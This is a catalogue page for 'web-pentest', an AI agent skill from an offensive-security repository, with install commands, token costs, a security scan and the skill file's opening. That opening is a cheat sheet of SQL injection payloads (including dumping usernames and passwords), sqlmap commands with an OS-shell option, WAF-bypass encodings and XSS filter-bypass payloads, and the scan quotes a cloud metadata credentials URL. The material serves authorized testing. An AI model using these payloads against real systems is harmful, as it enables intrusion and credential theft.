web-pentest

web-pentest is a skill for Claude Code, Codex from jessefmoore/offensive-claude-code. It costs 32 tokens per session (1,593 once invoked), scanned B, original, MIT.

A guide for testing web applications and APIs for security weaknesses. It covers common risks such as broken login controls, unsafe data handling, and flaws in how an application’s rules work.

In plain words
What is it for?
Use it for authorized security assessments of websites and APIs, including checking authentication, session handling, input validation, business rules, and defenses such as web application firewalls.
Why use it?
It helps security testers find weaknesses before attackers do. It organizes checks across websites, APIs, authentication, sessions, and business logic—the rules governing what users are allowed to do.

Skill for Claude CodeCodex

Install

Getting it into your agent

One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.

agentmods
npx agentmods add skills/jessefmoore/offensive-claude-code/web-pentest
Any agent
npx skills add jessefmoore/offensive-claude-code --skill web-pentest
Clone the repo
git clone --depth 1 https://github.com/jessefmoore/offensive-claude-code

Made for: Claude Code, Codex.

Wrote this? Show the measurements

A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.

agentmods badge for web-pentest

README.md
[![agentmods](https://agentmods.dev/badge/skills/jessefmoore/offensive-claude-code/web-pentest.svg)](https://agentmods.dev/skills/jessefmoore/offensive-claude-code/web-pentest)
Your own site
<a href="https://agentmods.dev/skills/jessefmoore/offensive-claude-code/web-pentest"><img src="https://agentmods.dev/badge/skills/jessefmoore/offensive-claude-code/web-pentest.svg" alt="Measured on agentmods" height="20"></a>
Per session 32 Skills are progressive disclosure: only the name and description are preloaded; the body loads when the skill is used.
When invoked 1,593 The whole file, excluding the scripts and references it only reads on demand.
Security scan B 2 findings. Scan, not verified.
Origin original No closer match found in the catalogue.
Token cost

What it costs to keep this loaded

Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.

ModelPer sessionOnce invoked
Fable 5 $0.00032 $0.01593
Opus 5 $0.00016 $0.00796
Sonnet 5 $0.00006 $0.00319
Haiku 4.5 $0.00003 $0.00159

Measured 3d ago against content hash 3b7ad37bcfe3, method: parsed. Prices are Anthropic first-party input rates as of 2026-08-30, from the pricing page.

Security

Grade B, and why

web-pentest scanned grade B with 2 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 3d ago.

A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.

Cloud metadata endpointmediumServer-side request forgery

One request to 169.254.169.254 can return temporary IAM credentials.

http://169.254.169.254/latest/meta-data/iam/security-credentials/ # AWS

Downgraded: this mod is about security review, or the phrase is quoted, so it is likely naming the pattern rather than instructing it.

Makes network callslowCapability

Not a fault in itself. Listed so you know the mod talks to something, and to what.

tools: burpsuite, sqlmap, ffuf, feroxbuster, nuclei, httpx, curl, wfuzz, dalfox, commix
skills/web-pentest/SKILL.md · 213 lines

How it starts

The opening of the file, as written. The whole thing — 213 lines — stays where its author put it; the contents beside it link to each section on GitHub.

Web Application Penetration Testing

When to Activate

  • Web application security assessment
  • API security testing (REST, GraphQL, gRPC)
  • Authentication and session management testing
  • Business logic vulnerability hunting
  • WAF bypass and filter evasion

SQL Injection

Detection

# String context: '  ''  ' OR '1'='1  ' AND '1'='2
# Numeric context: 1 OR 1=1  1 AND 1=2
# Time-based: ' OR SLEEP(5)--  '; WAITFOR DELAY '0:0:5'--
# Error-based: ' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--

Exploitation

# UNION-based extraction
' ORDER BY 1-- (increment until error = column count)
' UNION SELECT NULL,version(),NULL--
' UNION SELECT NULL,table_name,NULL FROM information_schema.tables--
' UNION SELECT NULL,CONCAT(username,':',password),NULL FROM users--

# Automated
sqlmap -u "http://target/page?id=1" --batch --dbs --level 3 --risk 2
sqlmap -r request.txt --batch --dbs --tamper=between,randomcase
sqlmap -u "URL" --os-shell --batch

WAF Bypass

%27%20OR%20%271%27%3D%271                    # URL encoding
' uNiOn SeLeCt NULL,version(),NULL--         # Case alternation
UN/**/ION SE/**/LECT NULL,version(),NULL--   # Comment insertion
/*!50000UNION*/ /*!50000SELECT*/             # MySQL version comments

XSS (Cross-Site Scripting)

Context-Specific Payloads

<!-- HTML body -->
<img src=x onerror=alert(document.domain)>
<svg/onload=alert(document.domain)>
<details open ontoggle=alert(1)>

<!-- Attribute context -->
" onfocus="alert(1)" autofocus="
"><script>alert(1)</script>

<!-- JavaScript context -->
";alert(1)//
'-alert(1)-'
${alert(document.domain)}

<!-- URL/href -->
javascript:alert(document.domain)

Filter Bypass

<ScRiPt>alert(1)</sCrIpT>                    # Case variation
<img src=x onerror=alert(1)>                  # Alt event handlers
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e; # HTML entities
eval('al'+'ert(1)')                           # String concat
window['alert'](1)                            # Bracket notation
alert`1`                                      # Template literal

Read the full file on GitHub · 213 lines

Changes

What this file has done since we first saw it

Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.

  1. 3d ago First seen · 213 lines · 32 tokens per session scan B 3b7ad37bcfe3

Subscribe to this mod's changes

web-pentest is a skill published in the GitHub repository jessefmoore/offensive-claude-code (2 stars, last pushed 3mo ago), licensed MIT. It adds 32 tokens to every session and 1,593 once invoked, about $0.0002 per session on Opus 5. A static security scan graded it B with 2 findings (cloud metadata endpoint, makes network calls). No closer match exists in the catalogue, so it is treated as the original; first seen 2026-08-31.

Related

Other skills, from other repositories

systematic-debugging

Use when encountering any bug, test failure, or unexpected behavior, before proposing fixes.

obra/superpowers · 21 tokens

brainstorming

You MUST use this before any creative work - creating features, building components, adding functionality, or modifying behavior. Explores user intent, requirements and design before implementation.

obra/superpowers · 37 tokens

auto-perf-optimize

Run agent-driven VS Code performance or memory investigations. Use when asked to launch Code OSS, automate a VS Code scenario, run the Chat memory smoke runner, capture renderer heap snapshots, take workflow screenshots, compare run summaries, or drive a repeatable scenario before heap-snapshot analysis.

microsoft/vscode · 62 tokens

chat-perf

Run chat perf benchmarks and memory leak checks against the local dev build or any published VS Code version. Use when investigating chat rendering regressions, validating perf-sensitive changes to chat UI, or checking for memory leaks in the chat response pipeline.

microsoft/vscode · 51 tokens

chat-pet-sprite-creation

Use when creating or changing VS Code chat pet sprite art, sprite sheets, state animations, eye treatments, Stable/Insiders variants, or pet transitions under src/vs/workbench/contrib/chat/browser/widget/media/chatPet.

microsoft/vscode · 53 tokens

cpu-profile-analysis

Analyze V8/Chrome CPU profiles (.cpuprofile) and DevTools trace files (Trace-.json). Use when: profiling performance, investigating slow functions, comparing code paths, finding bottlenecks, analyzing timeToRequest, understanding call trees from sampling profiler data, analyzing layout/paint/rendering, investigating…

microsoft/vscode · 71 tokens